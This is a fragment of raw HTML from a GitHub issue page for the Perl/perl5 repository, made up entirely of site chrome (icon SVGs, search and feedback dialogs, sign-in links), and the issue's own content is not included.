14.543V13H1.75A1.75 1.75 0 0 1 0 11.25v-8.5C0 1.784.784 1 1.75 1ZM1.5 2.75v8.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-8.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm5.28 1.72a.75.75 0 0 1 0 1.06L5.31 7l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.75.75 0 0 1 1.06 0Zm2.44 0a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L10.69 7 9.22 5.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </template> <template id="codespaces-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-codespaces"> <path d="M0 11.25c0-.966.784-1.75 1.75-1.75h12.5c.966 0 1.75.784 1.75 1.75v3A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm2-9.5C2 .784 2.784 0 3.75 0h8.5C13.216 0 14 .784 14 1.75v5a1.75 1.75 0 0 1-1.75 1.75h-8.5A1.75 1.75 0 0 1 2 6.75Zm1.75-.25a.25.25 0 0 0-.25.25v5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-5a.25.25 0 0 0-.25-.25Zm-2 9.5a.25.25 0 0 0-.25.25v3c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-3a.25.25 0 0 0-.25-.25Z"></path><path d="M7 12.75a.75.75 0 0 1 .75-.75h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path> </svg> </template> <template id="comment-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment"> <path d="M1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 13.25 12H9.06l-2.573 2.573A1.458 1.458 0 0 1 4 13.543V12H2.75A1.75 1.75 0 0 1 1 10.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h4.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="comment-discussion-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment-discussion"> <path d="M1.75 1h8.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 10.25 10H7.061l-2.574 2.573A1.458 1.458 0 0 1 2 11.543V10h-.25A1.75 1.75 0 0 1 0 8.25v-5.5C0 1.784.784 1 1.75 1ZM1.5 2.75v5.5c0 .138.112.25.25.25h1a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h3.5a.25.25 0 0 0 .25-.25v-5.5a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25Zm13 2a.25.25 0 0 0-.25-.25h-.5a.75.75 0 0 1 0-1.5h.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 14.25 12H14v1.543a1.458 1.458 0 0 1-2.487 1.03L9.22 12.28a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l2.22 2.22v-2.19a.75.75 0 0 1 .75-.75h1a.25.25 0 0 0 .25-.25Z"></path> </svg> </template> <template id="organization-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-organization"> <path d="M1.75 16A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0h8.5C11.216 0 12 .784 12 1.75v12.5c0 .085-.006.168-.018.25h2.268a.25.25 0 0 0 .25-.25V8.285a.25.25 0 0 0-.111-.208l-1.055-.703a.749.749 0 1 1 .832-1.248l1.055.703c.487.325.779.871.779 1.456v5.965A1.75 1.75 0 0 1 14.25 16h-3.5a.766.766 0 0 1-.197-.026c-.099.017-.2.026-.303.026h-3a.75.75 0 0 1-.75-.75V14h-1v1.25a.75.75 0 0 1-.75.75Zm-.25-1.75c0 .138.112.25.25.25H4v-1.25a.75.75 0 0 1 .75-.75h2.5a.75.75 0 0 1 .75.75v1.25h2.25a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM3.75 6h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 3.75A.75.75 0 0 1 3.75 3h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 3.75Zm4 3A.75.75 0 0 1 7.75 6h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 7 6.75ZM7.75 3h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 9.75A.75.75 0 0 1 3.75 9h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 9.75ZM7.75 9h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path> </svg> </template> <template id="rocket-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-rocket"> <path d="M14.064 0h.186C15.216 0 16 .784 16 1.75v.186a8.752 8.752 0 0 1-2.564 6.186l-.458.459c-.314.314-.641.616-.979.904v3.207c0 .608-.315 1.172-.833 1.49l-2.774 1.707a.749.749 0 0 1-1.11-.418l-.954-3.102a1.214 1.214 0 0 1-.145-.125L3.754 9.816a1.218 1.218 0 0 1-.124-.145L.528 8.717a.749.749 0 0 1-.418-1.11l1.71-2.774A1.748 1.748 0 0 1 3.31 4h3.204c.288-.338.59-.665.904-.979l.459-.458A8.749 8.749 0 0 1 14.064 0ZM8.938 3.623h-.002l-.458.458c-.76.76-1.437 1.598-2.02 2.5l-1.5 2.317 2.143 2.143 2.317-1.5c.902-.583 1.74-1.26 2.499-2.02l.459-.458a7.25 7.25 0 0 0 2.123-5.127V1.75a.25.25 0 0 0-.25-.25h-.186a7.249 7.249 0 0 0-5.125 2.123ZM3.56 14.56c-.732.732-2.334 1.045-3.005 1.148a.234.234 0 0 1-.201-.064.234.234 0 0 1-.064-.201c.103-.671.416-2.273 1.15-3.003a1.502 1.502 0 1 1 2.12 2.12Zm6.94-3.935c-.088.06-.177.118-.266.175l-2.35 1.521.548 1.783 1.949-1.2a.25.25 0 0 0 .119-.213ZM3.678 8.116 5.2 5.766c.058-.09.117-.178.176-.266H3.309a.25.25 0 0 0-.213.119l-1.2 1.95ZM12 5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> </template> <template id="shield-check-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield-check"> <path d="m8.533.133 5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667l5.25-1.68a1.748 1.748 0 0 1 1.066 0Zm-.61 1.429.001.001-5.25 1.68a.251.251 0 0 0-.174.237V7c0 1.36.275 2.666 1.057 3.859.784 1.194 2.121 2.342 4.366 3.298a.196.196 0 0 0 .154 0c2.245-.957 3.582-2.103 4.366-3.297C13.225 9.666 13.5 8.358 13.5 7V3.48a.25.25 0 0 0-.174-.238l-5.25-1.68a.25.25 0 0 0-.153 0ZM11.28 6.28l-3.5 3.5a.75.75 0 0 1-1.06 0l-1.5-1.5a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l.97.97 2.97-2.97a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="heart-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-heart"> <path d="m8 14.25.345.666a.75.75 0 0 1-.69 0l-.008-.004-.018-.01a7.152 7.152 0 0 1-.31-.17 22.055 22.055 0 0 1-3.434-2.414C2.045 10.731 0 8.35 0 5.5 0 2.836 2.086 1 4.25 1 5.797 1 7.153 1.802 8 3.02 8.847 1.802 10.203 1 11.75 1 13.914 1 16 2.836 16 5.5c0 2.85-2.045 5.231-3.885 6.818a22.066 22.066 0 0 1-3.744 2.584l-.018.01-.006.003h-.002ZM4.25 2.5c-1.336 0-2.75 1.164-2.75 3 0 2.15 1.58 4.144 3.365 5.682A20.58 20.58 0 0 0 8 13.393a20.58 20.58 0 0 0 3.135-2.211C12.92 9.644 14.5 7.65 14.5 5.5c0-1.836-1.414-3-2.75-3-1.373 0-2.609.986-3.029 2.456a.749.749 0 0 1-1.442 0C6.859 3.486 5.623 2.5 4.25 2.5Z"></path> </svg> </template> <template id="server-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-server"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v4c0 .372-.116.717-.314 1 .198.283.314.628.314 1v4a1.75 1.75 0 0 1-1.75 1.75H1.75A1.75 1.75 0 0 1 0 12.75v-4c0-.358.109-.707.314-1a1.739 1.739 0 0 1-.314-1v-4C0 1.784.784 1 1.75 1ZM1.5 2.75v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm.25 5.75a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25ZM7 4.75A.75.75 0 0 1 7.75 4h4.5a.75.75 0 0 1 0 1.5h-4.5A.75.75 0 0 1 7 4.75ZM7.75 10h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM3 4.75A.75.75 0 0 1 3.75 4h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 4.75ZM3.75 10h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path> </svg> </template> <template id="globe-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-globe"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM5.78 8.75a9.64 9.64 0 0 0 1.363 4.177c.255.426.542.832.857 1.215.245-.296.551-.705.857-1.215A9.64 9.64 0 0 0 10.22 8.75Zm4.44-1.5a9.64 9.64 0 0 0-1.363-4.177c-.307-.51-.612-.919-.857-1.215a9.927 9.927 0 0 0-.857 1.215A9.64 9.64 0 0 0 5.78 7.25Zm-5.944 1.5H1.543a6.507 6.507 0 0 0 4.666 5.5c-.123-.181-.24-.365-.352-.552-.715-1.192-1.437-2.874-1.581-4.948Zm-2.733-1.5h2.733c.144-2.074.866-3.756 1.58-4.948.12-.197.237-.381.353-.552a6.507 6.507 0 0 0-4.666 5.5Zm10.181 1.5c-.144 2.074-.866 3.756-1.58 4.948-.12.197-.237.381-.353.552a6.507 6.507 0 0 0 4.666-5.5Zm2.733-1.5a6.507 6.507 0 0 0-4.666-5.5c.123.181.24.365.353.552.714 1.192 1.436 2.874 1.58 4.948Z"></path> </svg> </template> <template id="issue-opened-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> </template> <template id="device-mobile-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile"> <path d="M3.75 0h8.5C13.216 0 14 .784 14 1.75v12.5A1.75 1.75 0 0 1 12.25 16h-8.5A1.75 1.75 0 0 1 2 14.25V1.75C2 .784 2.784 0 3.75 0ZM3.5 1.75v12.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM8 13a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path> </svg> </template> <template id="package-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-package"> <path d="m8.878.392 5.25 3.045c.54.314.872.89.872 1.514v6.098a1.75 1.75 0 0 1-.872 1.514l-5.25 3.045a1.75 1.75 0 0 1-1.756 0l-5.25-3.045A1.75 1.75 0 0 1 1 11.049V4.951c0-.624.332-1.201.872-1.514L7.122.392a1.75 1.75 0 0 1 1.756 0ZM7.875 1.69l-4.63 2.685L8 7.133l4.755-2.758-4.63-2.685a.248.248 0 0 0-.25 0ZM2.5 5.677v5.372c0 .09.047.171.125.216l4.625 2.683V8.432Zm6.25 8.271 4.625-2.683a.25.25 0 0 0 .125-.216V5.677L8.75 8.432Z"></path> </svg> </template> <template id="credit-card-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-credit-card"> <path d="M10.75 9a.75.75 0 0 0 0 1.5h1.5a.75.75 0 0 0 0-1.5h-1.5Z"></path><path d="M0 3.75C0 2.784.784 2 1.75 2h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 14H1.75A1.75 1.75 0 0 1 0 12.25ZM14.5 6.5h-13v5.75c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25Zm0-2.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25V5h13Z"></path> </svg> </template> <template id="play-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </template> <template id="gift-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-gift"> <path d="M2 2.75A2.75 2.75 0 0 1 4.75 0c.983 0 1.873.42 2.57 1.232.268.318.497.668.68 1.042.183-.375.411-.725.68-1.044C9.376.42 10.266 0 11.25 0a2.75 2.75 0 0 1 2.45 4h.55c.966 0 1.75.784 1.75 1.75v2c0 .698-.409 1.301-1 1.582v4.918A1.75 1.75 0 0 1 13.25 16H2.75A1.75 1.75 0 0 1 1 14.25V9.332C.409 9.05 0 8.448 0 7.75v-2C0 4.784.784 4 1.75 4h.55c-.192-.375-.3-.8-.3-1.25ZM7.25 9.5H2.5v4.75c0 .138.112.25.25.25h4.5Zm1.5 0v5h4.5a.25.25 0 0 0 .25-.25V9.5Zm0-4V8h5.5a.25.25 0 0 0 .25-.25v-2a.25.25 0 0 0-.25-.25Zm-7 0a.25.25 0 0 0-.25.25v2c0 .138.112.25.25.25h5.5V5.5h-5.5Zm3-4a1.25 1.25 0 0 0 0 2.5h2.309c-.233-.818-.542-1.401-.878-1.793-.43-.502-.915-.707-1.431-.707ZM8.941 4h2.309a1.25 1.25 0 0 0 0-2.5c-.516 0-1 .205-1.43.707-.337.392-.646.975-.879 1.793Z"></path> </svg> </template> <template id="code-square-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-square"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25Zm7.47 3.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L10.69 8 9.22 6.53a.75.75 0 0 1 0-1.06ZM6.78 6.53 5.31 8l1.47 1.47a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </template> <template id="device-desktop-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path d="M14.25 1c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 14.25 12h-3.727c.099 1.041.52 1.872 1.292 2.757A.752.752 0 0 1 11.25 16h-6.5a.75.75 0 0 1-.565-1.243c.772-.885 1.192-1.716 1.292-2.757H1.75A1.75 1.75 0 0 1 0 10.25v-7.5C0 1.784.784 1 1.75 1ZM1.75 2.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25ZM9.018 12H6.982a5.72 5.72 0 0 1-.765 2.5h3.566a5.72 5.72 0 0 1-.765-2.5Z"></path> </svg> </template> <div class="position-relative"> <ul role="listbox" class="ActionListWrap QueryBuilder-ListWrap" aria-label="Suggestions" data-action=" combobox-commit:query-builder#comboboxCommit mousedown:query-builder#resultsMousedown " data-target="query-builder.resultsList" data-persist-list=false id="query-builder-test-results" ></ul> </div> <div class="FormControl-inlineValidation" id="validation-9f0e43c3-7256-46a8-86d4-1ce7b90c015a" hidden="hidden"> <span class="FormControl-inlineValidation--visual"> <svg aria-hidden="true" height="12" viewBox="0 0 12 12" version="1.1" width="12" data-view-component="true" class="octicon octicon-alert-fill"> <path d="M4.855.708c.5-.896 1.79-.896 2.29 0l4.675 8.351a1.312 1.312 0 0 1-1.146 1.954H1.33A1.313 1.313 0 0 1 .183 9.058ZM7 7V3H5v4Zm-1 3a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"></path> </svg> </span> <span></span> </div> </div> <div data-target="query-builder.screenReaderFeedback" aria-live="polite" aria-atomic="true" class="sr-only"></div> </query-builder></form> <div class="d-flex flex-row color-fg-muted px-3 text-small color-bg-default search-feedback-prompt"> <a target="_blank" href="https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax" data-view-component="true" class="Link color-fg-accent text-normal ml-2">Search syntax tips</a> <div class="d-flex flex-1"></div> </div> </div> </div> </div> </modal-dialog></div> </div> <div data-action="click:qbsearch-input#retract" class="dark-backdrop position-fixed" hidden data-target="qbsearch-input.darkBackdrop"></div> <div class="color-fg-default"> <dialog-helper> <dialog data-target="qbsearch-input.feedbackDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="feedback-dialog" aria-modal="true" aria-labelledby="feedback-dialog-title" aria-describedby="feedback-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade Overlay--disableScroll"> <div data-view-component="true" class="Overlay-header"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="feedback-dialog-title"> Provide feedback </h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="feedback-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </div> <scrollable-region data-labelled-by="feedback-dialog-title"> <div data-view-component="true" class="Overlay-body"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="code-search-feedback-form" data-turbo="false" action="/search/feedback" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="tjeqT+3U4QUG4xnLMx63d7KbcbPpJzeC0JdXJXBu0qTBqZIgiiz/1QeWlo4XVlwhuUy8V1Yj6SoB3qwwKF5l8A==" /> <p>We read every piece of feedback, and take your input very seriously.</p> <textarea name="feedback" class="form-control width-full mb-2" style="height: 120px" id="feedback"></textarea> <input name="include_email" id="include_email" aria-label="Include my email address so I can be contacted" class="form-control mr-2" type="checkbox"> <label for="include_email" style="font-weight: normal">Include my email address so I can be contacted</label> </form></div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="feedback-dialog" type="button" data-view-component="true" class="btn"> Cancel </button> <button form="code-search-feedback-form" data-action="click:qbsearch-input#submitFeedback" type="submit" data-view-component="true" class="btn-primary btn"> Submit feedback </button> </div> </dialog></dialog-helper> <custom-scopes data-target="qbsearch-input.customScopesManager"> <dialog-helper> <dialog data-target="custom-scopes.customScopesModalDialog" data-action="close:qbsearch-input#handleDialogClose cancel:qbsearch-input#handleDialogClose" id="custom-scopes-dialog" aria-modal="true" aria-labelledby="custom-scopes-dialog-title" aria-describedby="custom-scopes-dialog-description" data-view-component="true" class="Overlay Overlay-whenNarrow Overlay--size-medium Overlay--motion-scaleFade Overlay--disableScroll"> <div data-view-component="true" class="Overlay-header Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 class="Overlay-title " id="custom-scopes-dialog-title"> Saved searches </h1> <h2 id="custom-scopes-dialog-description" class="Overlay-description">Use saved searches to filter your results more quickly</h2> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="custom-scopes-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg></button> </div> </div> </div> <scrollable-region data-labelled-by="custom-scopes-dialog-title"> <div data-view-component="true" class="Overlay-body"> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <div hidden class="create-custom-scope-form" data-target="custom-scopes.createCustomScopeForm"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="custom-scopes-dialog-form" data-turbo="false" action="/search/custom_scopes" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="m9JKMhKf+HAvOPSRlxJtFJ375vFXT1JdFUviEuQVQB+trY5jxLD9QECFsc5BZOl2SreE1Vx2hLCgQnGSDufIQg==" /> <div data-target="custom-scopes.customScopesModalDialogFlash"></div> <input type="hidden" id="custom_scope_id" name="custom_scope_id" data-target="custom-scopes.customScopesIdField"> <div class="form-group"> <label for="custom_scope_name">Name</label> <auto-check src="/search/custom_scopes/check_name" required only-validate-on-blur="false"> <input type="text" name="custom_scope_name" id="custom_scope_name" data-target="custom-scopes.customScopesNameField" class="form-control" autocomplete="off" placeholder="github-ruby" required maxlength="50"> <input type="hidden" data-csrf="true" value="aGZaO1YsYQcwpTqrIS72SBISy+GyK2U7IQw6Qgm/4WjwZDCukYsUdO9NTK2S5psiqIOI4iJIVj+YoGFvsw2grg==" /> </auto-check> </div> <div class="form-group"> <label for="custom_scope_query">Query</label> <input type="text" name="custom_scope_query" id="custom_scope_query" data-target="custom-scopes.customScopesQueryField" class="form-control" autocomplete="off" placeholder="(repo:mona/a OR repo:mona/b) AND lang:python" required maxlength="500"> </div> <p class="text-small color-fg-muted"> To see all available qualifiers, see our <a class="Link--inTextBlock" href="https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax">documentation</a>. </p> </form> </div> <div data-target="custom-scopes.manageCustomScopesForm"> <div data-target="custom-scopes.list"></div> </div> </div> </scrollable-region> <div data-view-component="true" class="Overlay-footer Overlay-footer--alignEnd Overlay-footer--divided"> <button data-action="click:custom-scopes#customScopesCancel" type="button" data-view-component="true" class="btn"> Cancel </button> <button form="custom-scopes-dialog-form" data-action="click:custom-scopes#customScopesSubmit" data-target="custom-scopes.customScopesSubmitButton" type="submit" data-view-component="true" class="btn-primary btn"> Create saved search </button> </div> </dialog></dialog-helper> </custom-scopes> </div> </qbsearch-input> <div class="position-relative HeaderMenu-link-wrap d-lg-inline-block"> <a href="/login?return_to=https%3A%2F%2Fgithub.com%2FPerl%2Fperl5%2Fissues%2F16649" class="HeaderMenu-link HeaderMenu-link--sign-in HeaderMenu-button flex-shrink-0 no-underline d-none d-lg-inline-flex border border-lg-0 rounded rounded-lg-0 px-2 py-1" style="margin-left: 12px;" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"site header menu","repository_id":null,"auth_type":"SIGN_UP","originating_url":"https://github.com/Perl/perl5/issues/16649","user_id":null}}" data-hydro-click-hmac="387e104a4aeea723f9808b36dd604512701e80ec48a53afc1733024c28e53a72" data-analytics-event="{"category":"Marketing nav","action":"click to go to homepage","label":"ref_page:Marketing;ref_cta:Sign in;ref_loc:Header"}" > Sign in </a> </div> <a href="/signup?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Fvoltron%2Fissues_fragments%2Fissue_layout&source=header-repo&source_repo=Perl%2Fperl5" class="HeaderMenu-link HeaderMenu-link--sign-up HeaderMenu-button flex-shrink-0 d-flex d-lg-inline-flex no-underline border color-border-default rounded px-2 py-1" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"site header menu","repository_id":null,"auth_type":"SIGN_UP","originating_url":"https://github.com/Perl/perl5/issues/16649","user_id":null}}" data-hydro-click-hmac="387e104a4aeea723f9808b36dd604512701e80ec48a53afc1733024c28e53a72" data-analytics-event="{"category":"Sign up","action":"click to sign up for account","label":"ref_page:/<user-name>/<repo-name>/voltron/issues_fragments/issue_layout;ref_cta:Sign up;ref_loc:header logged out"}" > Sign up </a> <button type="button" class="sr-only js-header-menu-focus-trap d-block d-lg-none">Reseting focus</button> </div> </div> </div> </div> </header> <div hidden="hidden" data-view-component="true" class="js-stale-session-flash stale-session-flash flash flash-warn flash-full"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-switched" hidden>You switched accounts on another tab or window. <a class="Link--inTextBlock" href="">Reload</a> to refresh your session.</span> <button id="icon-button-05fbfa36-d79d-4a83-a3b8-ea404723c793" aria-labelledby="tooltip-de90e49a-09a1-4bc8-8d7f-0e64b81e634d" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium flash-close js-flash-close"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x Button-visual"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button><tool-tip id="tooltip-de90e49a-09a1-4bc8-8d7f-0e64b81e634d" for="icon-button-05fbfa36-d79d-4a83-a3b8-ea404723c793" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Dismiss alert</tool-tip> </div> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" class="flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" 